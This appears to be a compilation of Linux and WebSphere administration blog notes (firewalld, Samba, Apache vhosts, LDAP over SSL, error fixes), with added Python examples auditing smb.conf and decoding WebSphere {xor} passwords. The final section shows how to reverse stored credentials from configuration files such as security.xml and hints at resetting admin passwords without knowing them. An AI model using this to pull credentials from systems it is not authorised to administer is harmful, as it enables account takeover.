rpcbind.service enabled
rsyslog.service enabled
rtkit-daemon.service enabled
smartd.service enabled
spice-vdagentd.service enabled
sshd.service enabled
sysstat.service enabled
systemd-readahead-collect.service enabled
systemd-readahead-drop.service enabled
systemd-readahead-replay.service enabled
tuned.service enabled
vmtoolsd.service enabled
avahi-daemon.socket enabled
cups.socket enabled
dm-event.socket enabled
iscsid.socket enabled
iscsiuio.socket enabled
lvm2-lvmetad.socket enabled
rpcbind.socket enabled
default.target enabled
graphical.target enabled
nfs.target enabled
remote-fs.target enabled

[root@rhel7 ~]# systemctl stop firewalld.service
[root@rhel7 ~]# systemctl disable firewalld.service
[root@rhel7 ~]# systemctl status firewalld.service
firewalld.service – firewalld – dynamic firewall daemon
Loaded: loaded (/usr/lib/systemd/system/firewalld.service; disabled)
Active: inactive (dead)

DEC 29 22:25:43 rhel7 systemd[1]: Started firewalld – dynamic firewall daemon.
DEC 29 22:43:29 rhel7 systemd[1]: Stopping firewalld – dynamic firewall daemon…
DEC 29 22:43:29 rhel7 systemd[1]: Stopped firewalld – dynamic firewall daemon.
DEC 29 22:44:14 rhel7 systemd[1]: Stopped firewalld – dynamic firewall daemon.
DEC 29 22:44:15 rhel7 systemd[1]: Stopped firewalld – dynamic firewall daemon.
DEC 29 22:44:19 rhel7 systemd[1]: Starting firewalld – dynamic firewall daemon…
DEC 29 22:44:19 rhel7 systemd[1]: Started firewalld – dynamic firewall daemon.
DEC 29 22:44:21 rhel7 systemd[1]: Stopping firewalld – dynamic firewall daemon…
DEC 29 22:44:21 rhel7 systemd[1]: Stopped firewalld – dynamic firewall daemon.
DEC 29 22:44:32 rhel7 systemd[1]: Stopped firewalld – dynamic firewall daemon.

systemctl start firewalld.service
systemctl stop firewalld.service
systemctl restart firewalld.service
systemctl status firewalld.service
systemctl enable firewalld.service
systemctl disable firewalld.service
systemctl is-enabled firewalld.service;echo $?
systemctl list-unit-files|grep enabled

 

Centos 7 Samba

FILEDOC /samba/docs
LEARDOCS /samba/tech

rpm -qi samba

mkdir -p /samba/docs
mkdir -p /samba/tech

ulimit -n 16384

vi /etc/security/limits.conf
* - nofile 16384

cd /etc/samba/

cp smb.conf smb.conf.origin

[global]
workgroup = FILESERVER
netbios name = SERVER1
server string = Samba Server
# security = share was removed in Samba 4; user-level security with guest mapping replaces it
security = user
map to guest = Bad User

# guest-readable documents (the /samba/docs directory created above)
[SHAREDOCS]
path = /samba/docs
read only = yes
browseable = yes
guest ok = yes

# group-restricted, writable share for GROUP1 members only
[TECHDOCS]
path = /samba/tech
public = no
writable = yes
write list = @GROUP1
valid users = @GROUP1

useradd test1
useradd test2
useradd test3
groupadd GROUP1

usermod -a -G GROUP1 test1
usermod -a -G GROUP1 test2
usermod -a -G GROUP1 test3

smbpasswd -a test1
smbpasswd -a test2
smbpasswd -a test3

chown GROUP1:GROUP1 /samba/tech
chmod 770 /samba/tech

ll -d /samba/tech

systemctl restart smb
systemctl enable smb
systemctl status smb

# smbclient -L localhost -U test1%P@ssw0rd
Domain=[FILESERVER] OS=[Unix] Server=[Samba 4.1.1]

Sharename Type Comment
——— —- ——-
SHAREDOCS Disk
TECHDOCS Disk
IPC$ IPC IPC Service (Samba Server)

Domain=[TECHDOCS] OS=[Unix] Server=[Samba 4.1.1]

Server Comment
——— ——-

Workgroup Master
——— ——-

C:\>net use * /del

\\192.168.1.18\d$

C:\>net use \\192.168.1.13 P@ssw0rd /U:test1
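As an added example (not from the original post), the Python below parses smb.conf the way Samba does, matching parameter names regardless of case and internal whitespace, and reports the exposures a reviewer checks for in a share configuration: security = share (removed in Samba 4), guest-accessible shares that are writable, authenticated shares with no valid users restriction, and one directory exported under several shares with different access rules, which is the situation the SHAREDOCS and TECHDOCS definitions create if both point at /samba/tech. The sample configuration is constructed for the example.

```python
# Constructed sample modelled on the share layout above; the DROPBOX share is added
# purely to exercise the guest-writable check.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = FILESERVER
   security = user
   map to guest = Bad User

[SHAREDOCS]
   path = /samba/tech
   read only = yes
   guest ok = yes

[TECHDOCS]
   path = /samba/tech
   public = no
   writable = yes
   write list = @GROUP1
   valid users = @GROUP1

[DROPBOX]
   path = /samba/dropbox
   guest ok = yes
   writable = yes
"""


def parse_smb_conf(text):
    """Minimal smb.conf parser: {section: {normalized key: value}}.

    Samba ignores case and whitespace inside parameter names ("valid users",
    "validusers" and "Valid Users" are the same), so keys are normalized the same way.
    """
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            sections[current] = {}
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.replace(" ", "").lower()] = value.strip()
    return sections


def as_bool(value, default=False):
    if value is None:
        return default
    return value.strip().lower() in ("yes", "true", "1")


def share_writable(opts):
    """writable/writeable are synonyms and the inverse of read only; default is read only."""
    for key in ("writable", "writeable"):
        if key in opts:
            return as_bool(opts[key])
    if "readonly" in opts:
        return not as_bool(opts["readonly"])
    return False


def audit_smb_conf(text):
    """Return (where, code, message) findings."""
    conf = parse_smb_conf(text)
    findings = []
    if conf.get("global", {}).get("security", "user").lower() == "share":
        findings.append(("global", "SECURITY_SHARE", "security = share was removed in Samba 4"))
    paths = {}
    for name, opts in conf.items():
        if name.lower() in ("global", "homes", "printers"):
            continue
        guest = as_bool(opts.get("guestok")) or as_bool(opts.get("public"))  # public is a synonym
        if guest and share_writable(opts):
            findings.append((name, "GUEST_WRITABLE", "anonymous users can write to this share"))
        if not guest and "validusers" not in opts:
            findings.append((name, "NO_VALID_USERS", "any authenticated Samba user can connect"))
        if "path" in opts:
            paths.setdefault(opts["path"].rstrip("/"), []).append(name)
    for path, names in paths.items():
        if len(names) > 1:
            findings.append((",".join(names), "PATH_REUSED",
                             f"{path} is exported by several shares; it is reachable under the most "
                             "permissive one, and only filesystem permissions then separate them"))
    return findings


if __name__ == "__main__":
    for where, code, message in audit_smb_conf(SAMPLE_SMB_CONF):
        print(f"[{where}] {code}: {message}")
```

For the layout above the PATH_REUSED finding is what makes the chmod 770 on /samba/tech load-bearing: it is the directory permission, not smb.conf, that keeps the guest share from exposing the group's files.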

Centos7 Apache HTTP SERVER

yum -y install httpd

rpm -qi httpd

systemctl enable httpd.service

ln -s ‘/usr/lib/systemd/system/httpd.service’ ‘/etc/systemd/system/multi-user.target.wants/httpd.service’

chkconfig httpd on

systemctl enable httpd

mkdir -p /wwwroot/www
echo “www.rmohan.com” > /wwwroot/www/index.html

mkdir /wwwroot/crm
echo “rmohan.com” > /wwwroot/crm/index.html

cd /etc/httpd/
mkdir vhost-conf.d
echo “Include vhost-conf.d/*.conf” >> conf/httpd.conf


<VirtualHost *:80>
    ServerName www.rmohan.com
    DocumentRoot /wwwroot/www/
    <Directory /wwwroot/www/>
        Require all granted
    </Directory>
</VirtualHost>

<VirtualHost *:80>
    ServerName crm.linuxidc.local
    DocumentRoot /wwwroot/crm/
    <Directory /wwwroot/crm/>
        Require ip 192.168.188.0/24
    </Directory>
</VirtualHost>

systemctl status httpd.service

systemctl restart httpd.service

journalctl -n

LDAP repository in Websphere Application Server 7

This is to record the steps I used to switch the LDAP repository in WebSphere Application Server 7 and enable LDAP over SSL.

Lets Start

Point your browser to the WAS console and login using admin account.

Add in the new LDAP server configurations

As I use a few repositories in my environment, I will be updating the repositories in the "Federated repositories" section.

Click the link in the left column: Security -> Global Security -> Configure (the drop-down box should point to "Federated repositories").

When the page has refreshed, look for "Manage repositories" -> Add.

Fill in the following:
- Repository identifier
- Directory type (here, I used IBM TDS)
- Primary hostname (put in the IP; if you have the entry in /etc/hosts, you can use the hostname)
- Port (389 for a start; later this will be updated to 636)
- Bind DN (the account used to connect to the LDAP server)

Click Apply when you are done. Then Click Save. Wait for sync to finish and click OK.

If something is wrong, WAS will complain, e.g.:
- cannot reach the LDAP server (ACL/firewall?)
- wrong port
- Bind DN is wrong
- etc.

Import LDAP server SSL

Store the SSL certificate as a flat file in the WAS server. You may need to convert the SSL certificate to “der” format and deposit the certificate to the deployment manager directory.

Create WAS Truststore

We will create a key store in WAS to hold the keys and certificate for LDAP. The idea is to keep separate key stores for different functions.

By Java definition, a keystore is an object that holds personal certificates, and a truststore is a Java object that holds signer certificates. I gather we only need to create the truststore, since the WAS security guide lists this step.

Click Security -> SSL Certificate and key management -> keystores and certificates

Then click New

Fill in the following:
- Name (I used LDAPTruststore)
- Management scope (the IBM security guide recommends cell level)
- Path (where you want to store this key store)
- Password

Import the LDAP SSL certificate into LDAPTruststore

From the breadcrumb of the previous step, click on "LDAPTruststore" and then Signer certificates.

Click Add

Fill in the following:
- Alias (I used ldapcert)
- File Name (the path to the LDAP SSL certificate you stored in the previous step)

Click Apply when you are done. Then click Save. Wait for the sync to finish and click OK.

Creating SSL alias link to the Trust store

Click Security -> SSL certificate and key management -> SSL configurations.

Click New

Fill in the following:
- Name (I used LDAPSSLSettings)
- Trust store name (LDAPTruststore)
- Key store name (LDAPTruststore)
- Management scope (cell level)

Click OK then Save then OK.

We are now ready to enable SSL communication to the LDAP server.

Go back to the repository.

Click Security -> Global Security -> Configure (drop down bar should point to “Federated repositories”)

When the page refreshed, Click “Manage repositories”

Fill up the following
– Port (change to 636)

Check the “Require SSL communication”

Choose the radio button “use specific SSL alias” and select LDAPSSLSettings from the drop down menu.

Click Apply when you are done. Then click Save. Wait for the sync to finish and click OK.

Add the Base DN

Here, we need to configure from where in LDAP server we should make the queries.

Click Security -> Global Security -> Configure (drop down bar should point to “Federated repositories”)

Click the “Add base entry to realm” button

Fill up the following
– Repository (Put in the name you used for “Repository identifier”)
– OU (Put in the Base DN here)

Click Apply when you are done. Then click Save. Wait for the sync to finish and click OK.

A little housekeeping

Remove the base DN for the old LDAP server.

Click on the base DN -> Remove
Then click Save. Wait for the sync to finish and click OK.

Click on Manage repositories
Check the old repository -> delete
Then Click Save. Wait for sync to finish and click OK

Restart AppSvr, NodeMgr and Dmgr

To be safe, I prefer to restart everything and make sure I can still log in as administrator and that the application has no problem working with the new LDAP server.

Check the Dmgr logs, AppSvr logs for signs of errors.

A small test

Click on “users and groups” -> manage users
Search for some valid users and verify that they come from the new LDAP server.
Get the software team to verify too in case the problem is subtle enough not to be caught in the application logs.

Allowing longer web session going through Apache to Websphere Application Server

Had a tough one last month when migrating the system to WAS. I'm still new to WAS and hit a few problems, so I am taking this chance to document them as my own reference; hopefully it helps you too.

Users had been complaining that the web service kept timing out, returning a 500 error.

What I found out was that I could tune the "ServerIOTimeout" parameter in the WAS plugin for Apache beyond the default. I used 900, which is 15 minutes in seconds.

In addition, a little performance tuning was done using "LoadBalanceWeight" to keep the application servers from being hit at random when they have just started up, especially when I have a cluster of them. As recommended by an IBM specialist, I used some numbers, with one of the application servers assigned an odd number, different from the rest.

The idea is to make one of the application servers the first one to serve, instead of randomising it.

Server CloneID="179d3la" ConnectTimeout="5" ExtendedHandshake="false" LoadBalanceWeight="20" MaxConnections="-1" Name="Node1" ServerIOTimeout="900" WaitForContinue="false"

Server CloneID="179d5sb" ConnectTimeout="5" ExtendedHandshake="false" LoadBalanceWeight="20" MaxConnections="-1" Name="Node2" ServerIOTimeout="900" WaitForContinue="false"

Server CloneID="179d8gc" ConnectTimeout="5" ExtendedHandshake="false" LoadBalanceWeight="21" MaxConnections="-1" Name="Node3" ServerIOTimeout="900" WaitForContinue="false"

Do let me know if you have better ideas of solving it.

Resolving ADMR0104E for Application Server

This write-up records the resolution of the ADMR0104E error encountered by WebSphere Application Server during start-up, after which the application server was unable to start.

From “SystemOut.log”, we see that the system is unable to read some properties file.

[6/27/12 12:08:35:103 SGT] 00000000 FileDocument E ADMR0104E: The system is unable to read document cells/Cell01/nodes/Node01/node-metadata.properties: java.io.IOException: Permission denied
at java.io.File.checkAndCreate(File.java:1715)
at java.io.File.createTempFile(File.java:1803)
at com.ibm.ws.management.repository.FileDocument.createTempFile(FileDocument.java:564)
at com.ibm.ws.management.repository.FileDocument.read(FileDocument.java:500)
at com.ibm.ws.management.repository.FileRepository.extractInternal(FileRepository.java:1134)

Some research and checks revealed that the permissions on the temp directory under the application server profile had been changed. The application server would then be no longer able to write to the temp directory for the node in the below directory.

# ls -ltr
total 0
drwxr-xr-x 3 root system 256 Jun 27 11:54 download

The cause of this is that the application server had been started as root. That is why the temp directory above is owned by root.

Potentially, you should check the ffdc directory as well.

# ls -l //AppSrv01/logs/ | grep ffdc
drwxr-xr-x 2 appusr appgrp 49152 Jun 27 13:50 ffdc

From research on the internet, the directory owner and the process execution user should be in the same group, and the permissions should be at least 774. To be fail-safe, change the ownership/group as required under //profiles/ and //profiles/.

Once the ownership is reverted back to “appusr”, we should see the result as below.

# chown -R appusr:appgrp download

# ls -ltr
total 0
drwxr-xr-x 3 appusr appgrp 256 Jun 27 11:54 download

The Application server is able to start up now.

[6/27/12 12:21:56:692 SGT] 00000000 AdminTool A ADMU3000I: Server appsrv open for e-business; process id is 4128910

To compare the application server's process execution user with the file system permissions, one can do the following:

1. Open the admin console
2. Open Servers –> Application Servers –>
3. Open Java Process Management –> Server Execution
4. Look for username and group of executing user

That's all.

Recover websphere password

Google online and found this interesting step to recover websphere 7.1 password.

For encrypting the password we have,

//java/bin/java -Djava.ext.dirs=//deploytool/itp/plugins/com.ibm.websphere.v7_7.0.1.v20100710_0411/wasJars/ -cp securityimpl.jar:iwsorb.jar com.ibm.ws.security.util.PasswordEncoder secret

The output is

decoded password == “secret”, encoded password == “{xor}LDo8LTor”

Hence, you can use the same method to decrypt the encrypted password.

//java/bin/java -Djava.ext.dirs=//deploytool/itp/plugins/com.ibm.websphere.v7_7.0.1.v20100710_0411/wasJars/ -cp securityimpl.jar:iwsorb.jar com.ibm.ws.security.util.PasswordDecoder {xor}LDo8LTor

The output is

encoded password == “{xor}LDo8LTor”, decoded password == “secret”

If you want to know, you can update the password for the deployment manager and nodes without knowing the password. Check out /…/config/cells//security.xml. 🙂
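The {xor} form is obfuscation rather than encryption: WebSphere XORs each byte of the password with 0x5F (the character '_') and base64-encodes the result, which is why PasswordDecoder can reverse it without any key, and why the real protection for security.xml is its file permissions. As an added example, not from the original post, the Python below implements that encoding and decoding and inventories the {xor} values in a security.xml-style fragment so their locations can be reviewed and the credentials rotated; the XML fragment, aliases and the second password are constructed, and the "{xor}LDo8LTor" value is the one shown above.

```python
import base64
import re

XOR_KEY = 0x5F  # the byte '_'; each plaintext byte is XORed with it before base64


def was_xor_encode(plaintext):
    """Produce the {xor}... form WebSphere stores in its configuration files."""
    masked = bytes(b ^ XOR_KEY for b in plaintext.encode("utf-8"))
    return "{xor}" + base64.b64encode(masked).decode("ascii")


def was_xor_decode(encoded):
    """Invert was_xor_encode; raises ValueError for anything that is not {xor} data."""
    if not encoded.startswith("{xor}"):
        raise ValueError("not a {xor}-encoded value")
    masked = base64.b64decode(encoded[len("{xor}"):], validate=True)
    return bytes(b ^ XOR_KEY for b in masked).decode("utf-8")


# Constructed security.xml fragment; the aliases and values are made up for the example.
SAMPLE_SECURITY_XML = """\
<security:Security xmlns:security="http://www.ibm.com/websphere/appserver/schemas/5.0/security.xmi">
  <authDataEntries alias="ldapBind" userId="cn=binduser,o=example" password="{xor}LDo8LTor"/>
  <authDataEntries alias="appDb" userId="appdb" password="{xor}Lz4sLCgwLTs="/>
  <authDataEntries alias="noSecret" userId="reader" password=""/>
</security:Security>
"""

# alias and password attributes of the same element ([^>] keeps the match inside one tag)
ENTRY_RE = re.compile(r'alias="([^"]*)"[^>]*?password="(\{xor\}[^"]*)"')


def find_encoded_passwords(xml_text):
    """Inventory every {xor} value in a security.xml-like document as (alias, encoded)."""
    return ENTRY_RE.findall(xml_text)


if __name__ == "__main__":
    print(was_xor_encode("secret"))          # {xor}LDo8LTor, as in the post above
    for alias, encoded in find_encoded_passwords(SAMPLE_SECURITY_XML):
        print(f"{alias}: {encoded} -> {was_xor_decode(encoded)}")
```

Because the transform is keyless, anyone who can read the configuration repository can recover every {xor} credential in it, so the inventory above is the list of secrets to rotate after an exposure of those files.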